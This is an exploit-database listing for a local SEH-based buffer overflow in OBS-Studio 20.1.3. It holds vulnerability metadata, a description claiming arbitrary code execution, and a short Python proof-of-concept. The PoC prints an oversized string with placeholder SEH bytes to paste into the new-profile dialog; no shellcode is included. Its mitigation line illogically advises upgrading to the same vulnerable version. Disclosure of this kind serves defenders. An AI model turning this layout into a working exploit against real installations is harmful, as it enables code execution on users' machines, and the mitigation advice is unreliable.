OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)

vendor:

OBS-Studio-20.1.3

by:

Greg Priest

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: OBS-Studio-20.1.3

Affected Version From: OBS-Studio-20.1.3

Affected Version To: OBS-Studio-20.1.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows7 x64 HUN/ENG Enterprise

2018

OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)

A buffer overflow vulnerability exists in OBS-Studio-20.1.3 when a maliciously crafted input is processed by the application. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. To exploit this vulnerability, an attacker must first copy a specially crafted string to the clipboard, then create a new profile in the application and paste the string into the input field. This will cause a buffer overflow and allow the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of OBS-Studio-20.1.3

Source

Exploit-DB raw data:

author = '''
   
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
   
# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)
# Date: 2018.01.15
# Exploit Author: Greg Priest
# Version: OBS-Studio-20.1.3
# Tested on: Windows7 x64 HUN/ENG Enterprise
# Software Download Link: https://obsproject.com/download

'''

bug = '''
Vulnerable input field:
<1> Copy printed "AAAAA...." string to clipboard!
<2> Profile -> New
<3> Paste the string in the input then press Ok

'''
junk = "A" * 459
SEH = "BBBB"
nextSEH = "CCCC"
overflow = "D" * 19533

print author
print "String: ", junk + SEH + nextSEH + overflow
print bug